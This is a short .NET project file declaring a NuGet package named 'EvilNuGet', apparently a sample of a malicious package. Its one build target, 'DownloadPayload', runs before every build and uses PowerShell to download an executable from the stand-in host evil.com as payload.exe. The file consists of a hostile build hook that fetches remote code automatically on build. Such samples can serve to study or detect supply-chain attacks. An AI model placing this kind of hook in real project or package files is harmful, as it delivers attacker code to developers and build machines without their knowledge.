<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net8.0</TargetFramework>
    <PackageId>EvilNuGet</PackageId>
    <Version>1.0.0</Version>
  </PropertyGroup>
  <Target Name="DownloadPayload" BeforeTargets="Build">
    <Exec Command="powershell -Command Invoke-WebRequest -Uri http://evil.com/payload -OutFile payload.exe" />
  </Target>
</Project>
